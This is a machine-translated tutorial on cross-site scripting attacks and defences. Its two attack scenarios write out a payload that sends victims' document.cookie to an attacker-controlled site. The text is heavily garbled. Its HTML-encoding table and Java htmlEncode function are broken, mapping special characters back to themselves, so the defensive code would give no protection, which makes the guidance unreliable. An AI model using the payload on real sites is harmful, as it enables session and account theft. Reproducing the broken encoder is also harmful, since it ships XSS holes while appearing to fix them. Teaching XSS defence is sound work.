XSS attacks and defense

XSS, also known as CSS, is short for Cross SiteScript. It is a common vulnerability in Web programs. XSS is a passive and used for client attacks, so it is easy to ignore its dangers. The principle is that attackers input (pass in) malicious HTML code to a website with the XSS vulnerability. When other users browse the website, the HTML code is automatically executed to attack the website. For example, steal user cookies, damage the Page Structure, and redirect to other websites.

XSS attacks

XSS attacks are similar to SQL injection attacks. Before the attacks, we first find a website with XSS vulnerabilities. XSS vulnerabilities are divided into two types: DOM Based XSS vulnerabilities, the other is the Stored XSS vulnerability. Theoretically, if the input data is not processed in all input fields, the XSS vulnerability exists. The harm of the vulnerability depends on the power of the attack code, and the attack code is not limited to the script.

DOM Based XSS

DOM-Based XSS is an attack Based on the DOM structure of web pages. This attack is characterized by a few people.

Scenario 1:

When I log on to a.com, I find that some content on its page is directly displayed based on a content parameter in the url. I guess it may be like this in other languages:

<% @ Page language = "java" contentType = "text/html; charset = UTF-8" pageEncoding = "UTF-8" %> <! DOCTYPEhtmlPUBLIC "-// W3C // dtd html 4.01 Transitional // EN" http://www.w3.org/TR/html4/loose.dtd "> 
 
I know Tom also registered the website, and know his mailbox (or other contact information can receive information), I make a hyperlink to him, hyperlink address: http://www.a.com? Content = <script> window. open ("www. B .com? Param = "+ document. cookie) </script>. When Tom clicks this link (assuming he has logged on to a.com), the browser will directly open B .com and send the cookie information of Tom in a.com to B .com, B .com is the website I set up. When my website receives this information, I steal the cookie information of Tom at a.com. The cookie information may contain a logon password. The attack was successful! In this process, the victim only has Tom himself. So when I enter a.com in the browser? Content = <script> alert ("xss") </script>. When the browser displays the page content, it executes my script and outputs the xss words on the page, this is an attack on myself. How can I attack others and make profits?
Stored XSS
Stored XSS is a storage-type XSS vulnerability. Because its attack code has been Stored on the server or database, many victims are victims.
Scenario 2:
A.com can post an article. After I log on to a.com, I published an article in a.com, which contains malicious code. <script> window. open ("www. B .com? Param = "+ document. cookie) </script> to save the article. At this time, Tom and Jack saw my published article. When I checked my article, they all caught up. Their cookie information was sent to my server, and the attack was successful! In this process, there are multiple victims.
The Stored XSS vulnerability is more harmful and more harmful.
XSS defense
In a world of contradictions, we have a spear and a shield. As long as there are no vulnerabilities in our code, attackers will not be able to get started. We need to make an unseed egg. XSS provides the following defense methods.
Perfect filtering system
Never trust user input. User input must be processed. Only valid values can be entered. Other values are filtered out.
Html encode
In some cases, if we cannot strictly filter user data, we also need to convert tags.
less-than character (<)<greater-than character (>)>ampersand character (&)&double-quote character (")"space character( )Any ASCII code character whose code is greater-than or equal to 0x80&#<number>, where <number> is the ASCII character value.
 
For example, the user input: <script> window. location. href = "http://www.baidu.com"; </script>, after saving, the final storage will be: <script> window. location. href = "http://www.baidu.com" </script> when presented, the browser converts these characters to text content for display, rather than a piece of executable code.
The other two methods are provided below. Use Apache commons-lang.jar
StringEscapeUtils. escapeHtml (str); // Chinese characters are converted to the corresponding ASCII code, and spaces are not converted.
Convert only some characters
Private static String htmlEncode (char c) {switch (c) {case '&': return "&"; case '<': return "<"; case '> ': return ">"; case '"': return" "; case'': return ""; default: return c + "";}} /** convert the input String 'str' to Html encode */public static String htmlEncode (String str) {if (str = null | str. trim (). equals ("") return str; StringBuilder encodeStrBuilder = new StringBuilder (); for (int I = 0, len = str. length (); I <len; I ++) {encodeStrBuilder. append (htmlEncode (str. charAt (I);} return encodeStrBuilder. toString ();}